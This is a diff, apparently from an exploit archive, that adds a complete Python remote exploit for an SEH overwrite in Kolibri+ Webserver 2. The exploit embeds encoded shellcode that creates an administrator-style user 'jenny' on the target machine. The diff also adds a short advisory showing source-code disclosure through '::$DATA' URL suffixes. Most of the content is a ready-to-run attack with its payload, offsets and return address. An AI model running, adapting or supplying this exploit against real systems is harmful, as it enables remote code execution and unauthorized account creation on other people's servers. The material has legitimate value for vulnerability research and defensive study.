+# +# $ ./kolibri.py 192.168.1.146 8080 +# +# [*] Kolibri+ Webserver 2 SEH Overwrite +# [*] Written by blake +# [*] Tested on Windows XP SP 1 +# [*] Denial of Service found by Usman Saeed +# +# [+] Connecting to 192.168.1.146 on port 8080 +# [+] Sending payload +# [+] Done. User jenny created with the password of pass on 192.168.1.146 + +import socket, sys + +print "\n[*] Kolibri+ Webserver 2 SEH Overwrite" +print "[*] Written by blake" +print "[*] Tested on Windows XP SP 1" +print "[*] Denial of Service found by Usman Saeed\n" + +if len(sys.argv)!= 3: + print "[*] Usage: %s <ip> <port>" + sys.exit(0) + +host = sys.argv[1] +port = int(sys.argv[2]) + +# windows/adduser - 446 bytes Encoder: x86/alpha_mixed +# USER=jenny, EXITFUNC=seh, PASS=pass + +shellcode = ( +"\x89\xe6\xdb\xc8\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x4b\x4c\x4b\x58\x47\x34\x45\x50\x43\x30\x43\x30\x4c\x4b\x50" +"\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x43\x31\x4a\x4f" +"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a" +"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31" +"\x49\x50\x4c\x59\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45\x57\x49" +"\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47\x4b" +"\x51\x44\x51\x34\x45\x54\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x46" +"\x44\x45\x51\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" +"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45" +"\x51\x4a\x4b\x4b\x39\x51\x4c\x47\x54\x45\x54\x49\x53\x51\x4f" +"\x50\x31\x4a\x56\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46\x50" +"\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d" +"\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4c\x43\x49\x50\x42" +"\x4a\x50\x50\x45\x38\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x43\x58" +"\x4a\x38\x4b\x4e\x4c\x4a\x44\x4e\x46\x37\x4b\x4f\x4a\x47\x42" 
+"\x43\x42\x4d\x43\x54\x46\x4e\x43\x55\x43\x48\x43\x55\x51\x30" +"\x46\x4f\x42\x43\x51\x30\x42\x4e\x42\x45\x44\x34\x47\x50\x44" +"\x35\x42\x53\x45\x35\x43\x42\x51\x30\x43\x5a\x43\x55\x42\x4e" +"\x42\x4e\x43\x49\x47\x50\x42\x50\x43\x51\x43\x43\x43\x43\x51" +"\x30\x46\x4f\x51\x51\x51\x54\x51\x54\x51\x30\x51\x36\x47\x56" +"\x47\x50\x42\x4e\x45\x35\x44\x34\x47\x50\x42\x4c\x42\x4f\x43" +"\x53\x43\x51\x42\x4c\x43\x57\x42\x52\x42\x4f\x42\x55\x44\x30" +"\x51\x30\x51\x51\x45\x34\x42\x4d\x42\x49\x42\x4e\x45\x39\x44" +"\x33\x44\x34\x43\x42\x43\x51\x44\x34\x42\x4f\x42\x52\x43\x43" +"\x47\x50\x43\x5a\x45\x35\x42\x4e\x42\x4e\x43\x49\x51\x30\x46" +"\x4f\x47\x31\x51\x54\x47\x34\x43\x30\x41\x41") + +payload = "\x41" * 8 # junk buffer +payload += "\x90" * 10 # nop sled +sc = shellcode # 446 bytes of shellcode +jump_near = "\xe9\x34\xfe\xff\xff" # jump near -460 bytes +next_seh = "\xeb\xf9\xff\xff" # short jump back -7 bytes +seh = "\x6f\x2a\xe6\x77" # p/p/r from kernel32.dll +junk = "\x41" * 424 # junk buffer + +print "[+] Connecting to %s on port %d" % (host,port) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +try: + s.connect((host,port)) + print "[+] Sending payload" + s.send("GET /index.html" + payload + sc + jump_near + next_seh + seh + junk + " HTTP/1.0\r\n\r\n") + s.close() + print "[+] Done. User jenny created with the password of pass on %s\n" % host +except: + print "[x] Could not connect!" + +# milw0rm.com [2009-09-11] diff --git a/platforms/windows/remote/9650.txt b/platforms/windows/remote/9650.txt index ddd1d19da..4b80c9829 100755 --- a/platforms/windows/remote/9650.txt +++ b/platforms/windows/remote/9650.txt 
@@ -1,28 +1,28 @@
-#################################################################################
-# #
-# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #
-# aka: More fun with Kolibri+ 2 webserver #
-# Found By: Dr_IDE #
-# Tested On: Windows XPSP3 #
-# #
-#################################################################################
-
-- Description -
-
-Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
-the application available.
-
-This vulnerability is similar to the one reported earlier by Skull-HacKeR.
-
-Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
-(download in this case) by the following means.
-
-- Technical Details -
-
- http://[ webserver IP]/[ file ][::$DATA]
-
- http://172.16.2.101/default.asp::$DATA
-
- http://172.16.2.101/index.php::$DATA
-
-# milw0rm.com [2009-09-11]
+#################################################################################
+# #
+# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #
+# aka: More fun with Kolibri+ 2 webserver #
+# Found By: Dr_IDE #
+# Tested On: Windows XPSP3 #
+# #
+#################################################################################
+
+- Description -
+
+Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
+the application available.
+
+This vulnerability is similar to the one reported earlier by Skull-HacKeR.
+
+Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
+(download in this case) by the following means.
+
+- Technical Details -
+
+ http://[ webserver IP]/[ file ][::$DATA]
+
+ http://172.16.2.101/default.asp::$DATA
+
+ http://172.16.2.101/index.php::$DATA
+
+# milw0rm.com [2009-09-11]